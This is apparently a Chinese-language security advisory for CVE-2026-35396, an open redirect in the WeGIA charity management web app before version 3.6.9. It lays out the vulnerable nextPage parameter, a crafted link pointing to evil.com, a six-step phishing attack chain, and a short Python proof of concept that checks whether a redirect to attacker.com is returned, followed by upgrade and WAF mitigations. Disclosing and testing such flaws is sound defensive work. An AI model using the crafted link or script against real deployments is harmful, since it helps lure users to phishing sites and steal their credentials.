CVE-2026-35396 CVSS 6.1 中危

CVE-2026-35396 WeGIA开放重定向漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35396

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA

漏洞概述

WeGIA是用于慈善机构的Web管理器。在3.6.9之前的版本中，其/WeGIA/controle/control.php端点存在开放重定向漏洞。应用程序未对nextPage参数进行有效验证，当结合特定参数时，攻击者可诱导用户重定向至恶意站点。该漏洞可用于网络钓鱼、凭证窃取及恶意软件分发。该问题已在3.6.9版本中修复。

技术细节

该漏洞位于WeGIA应用的/WeGIA/controle/control.php接口中。由于应用程序缺乏对“nextPage”参数的安全校验，当请求中包含metodo=listarId和nomeClasse=IsaidaControle参数时，服务器会直接使用用户提供的nextPage值作为重定向目标。攻击者可以构造包含恶意URL的特制链接（例如：http://target/WeGIA/controle/control.php?metodo=listarId&nomeClasse=IsaidaControle&nextPage=http://evil.com）。由于重定向发生在信任的WeGIA域名下，用户难以察觉URL的变化，从而容易被诱导至钓鱼网站泄露敏感信息。

攻击链分析

STEP 1

侦查

攻击者识别出运行WeGIA且版本低于3.6.9的目标系统。

STEP 2

构造链接

攻击者利用漏洞参数构造恶意的重定向URL，将nextPage参数设置为钓鱼网站地址。

STEP 3

社会工程学

攻击者通过电子邮件或聊天软件将伪装成合法链接的恶意URL发送给目标用户。

STEP 4

用户交互

受害者点击链接，浏览器向WeGIA服务器发送请求。

STEP 5

重定向执行

WeGIA服务器响应重定向指令（302），将受害者引导至攻击者控制的恶意网站。

STEP 6

后续攻击

受害者在恶意网站输入凭证或下载恶意软件，导致信息泄露或系统被入侵。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-35396
# This script demonstrates the Open Redirect vulnerability in WeGIA.

import requests

target_url = "http://target-ip/WeGIA/controle/control.php"
malicious_url = "http://attacker.com/phishing"

# Payload construction based on vulnerability description
params = {
    "metodo": "listarId",
    "nomeClasse": "IsaidaControle",
    "nextPage": malicious_url
}

print(f"Sending request to: {target_url}")
print(f"Attempting to redirect to: {malicious_url}")

try:
    response = requests.get(target_url, params=params, allow_redirects=False)
    
    # Check if the response indicates a redirect (HTTP 302/301)
    if response.status_code in [301, 302, 303, 307, 308]:
        location_header = response.headers.get('Location')
        print(f"[+] Vulnerability Confirmed!")
        print(f"[+] Server responded with status code: {response.status_code}")
        print(f"[+] Redirect Location: {location_header}")
        if malicious_url in location_header:
            print(f"[+] Redirect leads to attacker-controlled domain.")
    else:
        print("[-] Exploit failed or target not vulnerable.")
        
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施

建议用户尽快将WeGIA系统升级至3.6.9或更高版本。在无法立即升级的情况下，应在Web应用防火墙（WAF）中添加规则，拦截针对/WeGIA/controle/control.php接口且包含未经验证的nextPage参数的请求，或严格限制该参数仅允许内部域名或白名单域名。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表